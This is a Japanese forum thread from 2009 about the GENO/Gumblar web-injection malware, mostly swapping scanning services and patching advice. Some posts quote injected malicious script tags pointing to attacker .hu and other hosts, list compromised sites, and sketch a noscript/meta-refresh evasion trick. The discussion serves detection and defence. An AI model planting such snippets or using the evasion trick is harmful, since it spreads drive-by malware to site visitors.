ソース見たら色んな数字が並んでたけど、あれは感染してるってことか？

センセイはスルー(行ってない)
http://www.google.com/safebrowsing/diagnostic?site=taemkft.extra.hu/sitebuilder/24.php&hl=ja

ノートンは行けばはじくよ

>>833
簡単にチェックする方法がなくなったからな・・・
心配ならGumblarの対応がよさそうなKasperskyでスキャンするくらいか
下のはKasperskyエンジンのオンラインスキャンサービス
ウイルス対策ソフトを入れてないならKasperskyの体験版を一時的に入れるのも手

@niftyウイルスチェックサービス
ttp://www.nifty.com/security/vcheck/index.htm

>>839
やはりそれしか今のところはないようですね。
丁寧に教えてくださってありがとうございます。

セキュアブレイン、クラウド活用ウイルス対策ソフトを無償提供
ttp://internet.watch.impress.co.jp/docs/news/20091126_331491.html

「gred AntiVirusアクセラレータ」は単体でも動作可能だが、
併用するウイルス対策ソフトが検知したウイルス情報を
クラウドで共有することで検知率を高めるという。

併用可能なウイルス対策ソフトは、
「ノートンアンチウイルス」
「ノートンインターネットセキュリティ」
「ノートン360」
「ウイルスバスター」
「ウイルスセキュリティZERO」
「カスペルスキー インターネットセキュリティ」
「Microsoft Security Essentials」
「avast! AntiVirus」
「Avira AntiVir」
「AVG」など。

>>841
>>832 にgredの文字が見えるがスルーしてる？
まだ使用者が2万人程度だから仕方がないか

knoppixでgenoウイルスを除去できると聞いたんですが、やり方が載ってるサイトはありますか？

>>842
＞まだ使用者が2万人程度だから仕方がないか
そのとおり
効果が期待できるのはこれから

NIS2010のSONAR2は役に立つのだろうか

ああ、俺の言ってるgred, は、サイトの安全性をチェックするサイトのほう。
ここね→　ttp://www.gred.jp/
同じ会社だが、ソフトのgred AntiVirusアクセラレータを入れて試したってことではない。

他のNorton Safe web, aguse,も同じようなとこ。url入れると、そこは安全とか言ってくれるやつ。
ソースチェッカーのオンラインもあったね、前述のより見た目わかりづらいんでやってない。ｗ

どうなんだろうね、こういうやつの信頼性って？

Norton Safe webは2ch型の掲示板を見るだけで真っ赤になるから信用はしていない

>>845
何度も言われてるとおり脆弱性保護で検知される

>>846
安全とかの記述より、とりあえずソースだけチェックしてみたらGENOっぽいのない？

SONARは初代はスルースキルｗが高かったけど2は凄い
アプリを強制的に削除しまくり（復元可）
symantecに簡単に報告できてすぐに対応してくれるのが救いか
誤爆率高いんだからある程度は働いてもらわないとな

>>843
正確にはシステムの復元機能のバックアップを使って
レジストリをmidi9のエントリがない状態に書き戻す方法だと思う
単にレジストリを復元するだけでウイルスを除去するわけではない
例の「黒い画面にマウスカーソル」に有効

参考サイト
ttp://pctrouble.lessismore.cc/boot/recover_registry.html

>>846
そのサイトは>>832にある.huドメインじゃなくて別のアドレスなんだよね？
で、そこへ行くと.huドメインからなんか落ちてくると言われるんでしょ
>>832のURL削ってトップページをAguseで見てみたら
KasuperskyがTrojan-Clicker.JS.Iframe.bc　と警告出したよ。
覗いたURLがどこのものか知らないけど.hu(ハンガリードメイン）からphpを引っ張ってくる必要があるサイトなのかどうか考えた方が良い。

>>853は無視か可哀想に

Gumblarに限らずだけど、閲覧ブラウザで落してくるウィルス変えたりするやつは
Aguseやgredみたいなので覗くと何も返してこないのかウィルス判定出ないことが結構ある。
JavaScriptが無効だとGoogleのトップページにリダイレクトされるとか
脆弱性のないPCで覗くと404返すとかそういう仕組みになってることもある。

でNorton Safe Webはリアルタイムで検査するわけじゃないから、
ウィルス撤去されてもなかなか判定が変わらないとか普通にある。
ドメイン単位だから、レンタルスペースでいろんなHPが同居してても全てまとめて判定する。

Thanks！
>>849
ソースチェッカーは、見てみた。怪しいリンクは確かにあるぞってことぐらいで、
それ以上俺にはよくわからないと言うのが、正直なとこなんだ。ごめん。

>>852
Aguseは、俺と同じKasuperskyでチェックするらしいのに、安全とか言うから、
おかしいのは、こっちか？と不安だったんだが、そういうことか。
まあ、もうあそこ覗くのはやめとこうと思う。

>>811の記事だが･･･

自宅の壁とか屋根に巨大な穴が空いても、
ダンボールとガムテープで穴を塞げばきっと大丈夫。

ってことだろ？


筆者はセキュリティを語る以前に、
自分の脳の障害(バグ)を治した方が良いような希ガス。

>>811の記事についてはGnomeさんも呆れてるね。
ttp://www3.atword.jp/gnome/2009/11/26/a-reason-why-the-bots-never-be-disappeared/

「新型インフルエンザは、去年のインフルエンザワクチンでも
撃退できる可能性が高い」って言ってるようなもんだよね。

>>832
aguseはゲートウェイを使わないと検出しないことが多い
と思ってTOP見に行ったら別のものを検出した
Trojan-Clicker.JS.Iframe.bc

>>>856
この部分かな？
＜script＞var jojo = document.createElement（'iframe'）
〜中略〜
jojo.setAttribute（'style', 'display:none'）
以下略

>>832はIE専用？

いや。IE以外のスクリプトもあるのでFxもOperaもやられる
(FlashPlayerやAdobeReaderが古い場合。IEも同様)。
ちなみになぜかUA文字列「Safari」を蹴っているので
SafariやChromeは感染しない(Chromeの砂箱に引っかかるのか?)。

これはw
http://www.google.com/safebrowsing/diagnostic?site=http://www.geocities.jp/happy_mimi1418/jiturei.htm&hl=ja

>>860
それだとgeocities全体であってその特定サイトだけじゃなくね？

ついでにそのサイト自体も現時点ではこんな感じでクリーン
</head>

<body bgcolor=white

１日２０分！〜(ry
先日、Gnomeさんが苦笑してたスパム業者のサイトだが・・・
ivyfancl．com／style．html
※URLは17個くらいある

11/21頃に入ってたやつ
＜script src=hxxp:／／astrologe-goette．de／bilder／kinder．php ＞＜/script＞＜BODY

さっき覗いてみた
＜script src=hxxp:／／soinsantirides．com／index_fichiers／Dossiers_Conseils．php ＞＜/script＞＜BODY

これって無限ループ中？

そういうのは削除と挿入の繰り返しが行われてるってことになる
つまり原因を理解できてないままとりあえず削除して運用を続けてる

いんじぇくしょん祭www
ttp://asianmotors●co●in/

あらあら

結局フラッシュだかadobeだか更新しとけばいいだけ
そうじゃないのもあるけどそれはまた別の話だろー

別じゃないよ

別って言えば別だけど
今はGumblarじゃなくてGumblar.xの話だからな

Gumblar.xでも同じ

Gumblarでは別だが
Gumblar.xでは別じゃないってこと
だからどっちも正しい

何でもかんでもGENOにするやつがいるからな
そう言う話題ももちろん良いけど

Gumblar.xでも同じだっつの
未知の脆弱ついたりしてないから

亜種が○○かもしれん
てどこまでも不安煽ったりね

収束するならウィルスはこの世からとっくに根絶してると思わry

詮無きこと

>>873
何言ってんだ
無知で日本語も通じない人は書き込まないでね

Gumblar.xでも同じだっつの
未知の脆弱ついたりしてないから

既知の脆弱性だから個々ノソフトを
結局更新しとけばいいだけか

何が同じなんだよ
ちゃんと詳しく書けよ
そりゃ同じようなところもあるが違うだろ
アホか

ウイルスは皆同じと言ってるのと同じだろｗ
どうでも良いけど

ソフトを更新しとけば感染しないのは同じ

何でもかんでもGENOにするやつがいるからな

>>883
GENOに頭やられたな

>>882
同じマルウェアはいっぱいあるな

なにが

拡大しててきた時点でそうじゃないマルウェアもいっぱいあるな

どうでも良いよ
レベル低すぎて意味がない

詮無きこと

ようするに対策とかでFirefoxユーザが増えるとそれだけ狙われるので
ずっとIEでいてくださいねってこと

いいえ

さらにレベルを下げる気だな

事実じゃん

全部糞チェッカーのバージョン表記のセイ

被害者か
かわいそうだがもう相手しない

なに言ってんだか

かわいそう

こんなもんにかかるのはBlasterにかかった奴らと同程度だな

流れも読めないアホが同じじゃないとか騒いでただけか

ド素人が偉そうだな

かわいそう

かわいそう

結局フラッシュだかadobeだか更新しとけばいいだけ
そうじゃないのもあるけどそれはまた別の話だろー

そうだね♀

>>771
CSSや画像やスクリプトをCGIで要求してくる大手サイトは今でもあるし
これからもアクセス解析や広告に使われて増えるはず。

・基本はスクリプト、オブジェクトを無効にして特定のドメインだけ許可。
・FireFoxならRequestPolicyでホワイトリストを作っていく
「YouTubeを見れる環境は危険だ」という認識くらいは持っていても悪くないと思う。

>>809
いや、俺は一般Windowsユーザーが「制限ユーザーを作る事」が難しいことだと思う。

結局フラッシュだかadobeだか更新しとけばいいだけ

なら一般Windowsユーザーとかいうのはホワイトリストがどうたらとか難しいな

スクリプトはじこうとがんばるより元断たなきゃ
流行りだしたころは修正ファイルでてんだから

noscriptタグの中にmetaタグでrefrsh先にbase64でscriptを書けばイチコロ

やけに伸びてると思ったらひどいことになっててわろた

淘汰は自然の摂理

ループって怖くね

youtubeは今のところどうかな？
改ざんとかされてない？

ばーか
自分でソース見ろや
ばーか

>>914
煽るな

触るな

youtubeとかかいざんされても
結局フラッシュだかadobeだか更新しとけばいいだけ

今日もげのってるね

輝オート(メツブシ・デリカ専門店)の中古車情報ページが陥落
ttp://www●hikariauto●co●jp/u-carstock/index●php
＜/head＞＜script src=ｈttp://steventoth●extra●hu/wpscripts/indx_260●php ＞＜/script＞＜body

一昨日あたりからhuドメインばかり出てくるが・・・
ハンガリーに何かあるのか？

お尻がゆるいだけじゃない

sage入れる場所間違えたのナイショだぞorz

「日本大学歯学部同窓会」
ttp://aa-nusd●jp/
ここも陥落しとる。

やばいよやばいよー

日歯大のやつ、http://www.gred.jp/　ここは検知するけど
　　　　　　　http://www.aguse.jp/　これはスルーする。

>>923
hispaniaforex拾ってきたよ。
ttp://www.virustotal.com/jp/analisis/a2357ace3545a71c8e012ec7001cda765a0bae296b5b8ab578f1cfabd19b7f06-1259553217
Gumblarはアクセス制御をおこなっていて、
同一IPによる後からのアクセスには無害な404を返す
(php=html単体は複数回採取できたりするので
pdfやswfを触るとそれ以降は蹴られるっぽい)。

aguseで調べた人が2人以上居たんでしょ。
ソースチェッカーではキャッシュ表示がデフォで、
キャッシュ削除されても「Proxy」にチェック入れると
たいてい取得できるんだけど、aguseはその辺がな…。

なんか似たようなこと半年前も見たような気がするぞｗ

aguseは対応しとらんよ。（5月の時のものは検出するけど

次スレ用のテンプラ(案)

＊スレタイ＊
【Gumblar】GENOウイルススレ★23【Gumblar.x】

＊内容＊
【感染しないように行っておくべき対策】
・Windows Update (Microsoft Update)
自動更新を有効にして、常に最新の状態を保つ。

・Adobe Flash Playerのアップデート
ttp://get.adobe.com/jp/flashplayer/

・Adobe (Acrobat) Readerのアップデート
ttp://get.adobe.com/jp/reader/
※JavaScriptはOFFにしておく事。


【webブラウザのJavaScriptをOFF】
・Firefox　NoScriptを導入する。
・Google Chrome　-disable-javascriptで起動。
・Opera　ツール→設定→詳細設定タブ→「JavaScriptを有効にする」のチェックを外す。
・IE(インターネット・エクスプローラー)　Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox＋NoScript」を導入しましょう。


補足があったら追記をお願いします。

>>927
いいかげんスレタイのメインにGENO入れるのやめないか？
↓こんなのとか

【新GENO】Gumblar.x / Daonolウイルススレ　★23

>>927
もうちょっとあとで貼ろうかと思って用意していたテンプレ改変
うーむ、ゴテゴテしすぎかな

＊＊＊ 2009年10月あたりから凶悪度を増した亜種が出回っています ＊＊＊

■ Windows Update / Microsoft Updateを更新
　XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新(使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
　Adobe Readerを開いて　ヘルプ→アップデートの有無をチェック
■ Adobe Flash Playerを更新(動画サイト見てるなら絶対入ってる。IE版、非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp

以上でGumblar.x / Daonolは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (Sleipnir、IEでも上手に設定するとなんとかなります)

〜〜〜 つづき 〜〜〜
優先度低
■ Vistaの人ははUACをONにする
■ Adobe Shockwave Player (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Version 6 Update (Javascriptとは違うので注意)
ttp://www.java.com/ja/

感染が疑わしい人は迷わずクリーンインストール推奨です
また安全なPCからパスワード類の変更もしてください

■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください

@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
ttp://www.nifty.com/security/vcheck/index.htm

■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1

■ 旧型GENOウイルスのまとめなど
＊＊＊ 【注意！】10月からの亜種には無効な情報があります ＊＊＊
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
＊＊＊ 【注意！】10月からの亜種には無効な情報があります ＊＊＊

【前スレ】
GENOウイルススレ　★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
【関連スレ】
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
http://pc11.2ch.net/test/read.cgi/sec/1245402584/
GENOウイルススレ　感染4台目 - インターネット板
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
http://changi.2ch.net/test/read.cgi/doujin/1244096936/



以上、好きなように使ってくれ

GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

結局GENO入れてるのね・・・

マカフィーからお知らせが来てたので念のため
マルウェアの感染によりマカフィーのWebページが開けなくなる問題について
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp

このツール使うよりもリカバリーした方が良いと思うんだけど
症状にあるメールソフトでのエラーって他で聞かない気が

なんの話だよ

新種に感染したらどうなるの？

>>928
一般ではすでにGENOウィルスで通ってるし
おそらく2chでの祭りが命名由来だから
名前を変えたら再流行したときにスレ誘導に困る、から
スレタイにGENOはのこすことになるはず

>>937
Gumblar.x / Daonolあたりが表では一般的になっているから
2ch由来はすでに過去の話だと思うが
誘導は大事だから残すことには反対ではないが
本来のウイルス名がまったく入らないのはどうかと思う
立ってしまったからこれ以上は言わないが・・・

UAC有効にしてれば効果有るというならWin7でも効果あるんじゃね

【捕捉orz】GENOウイスルスレ★23【＼(^o^)／ｵﾜﾀ】

こっちのほうが良かったのに・・・

ウイスルか…

個人情報をさらすマルウェア、Shareを通じて日本で流通
http://headlines.yahoo.co.jp/hl?a=20091130-00000006-zdn_ep-sci

これってエロゲーにsetup.exeを仕込まれてた例のアレ？
晒し会場（現在は404）
ttp://p3p.jp/top

winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1233404027

何の話だよ

ほんと何の話だよ

今の所アップデートをちゃんとして、NoScriptいれておけば大丈夫なのかな？
怖くてたまらん…

NoScriptは入れても入れなくてもどっちでもいい。
必須なのはWindowsや各種ソフトのぬかりないアップデートだけ。

>>945
更新をしっかり確認すればおｋ
しっかり更新すれば無駄に不安がる必要はないと何度言えば

>>946-947
ありがとう
恐すぎてセキュリティ意識が以前より高くなったよ…

NoScript は信頼できるホストにも制限をかけるのと、
FRAME 関連にも制限をかけるのを忘れないように。

ソースチェッカーオンラインが閉鎖したんだが
どうしよう？

ちょっとだけ掘ってみた。

tp://irasuto●karaaget●net/2/
tp://seopro●sakura●ne●jp/engine/seo5/
tp://www●idealgroup-24●com/sub4●html
tp://www●cafedeaiai●net/index.html
tp://www●tornadogames●com/

妙な業種ばかりだが・・・気にするな(苦笑)

>>950
そういや年内には閉鎖するって言ってたな

>>949
ｻﾝｸｽ
チェックしてあった

>>950
SCOからリンクしてたこのへんとかかな
http://web-sniffer.net/

>>948
更新確認はちゃんとやるんだぞ
Adobeとかのサイトいって確認
MSUpdateの場合は更新があったときはその適用＋再起動後に
もう1度確認して他の重要な更新がないことを確認

アプリケーションの更新確認にはこういうのも使える。
http://secunia.com/vulnerability_scanning/personal/

個人的にコレも推しておこう
Microsoft Baseline Security Analyzer
ttp://technet.microsoft.com/en-us/security/cc184924.aspx

"<script src=http://*.php ></script><body*" の検索結果 約 3,590,000 件

アスタリスク使えたのね･･･

>>955
ｻﾝｸｽ
ちゃんと確認する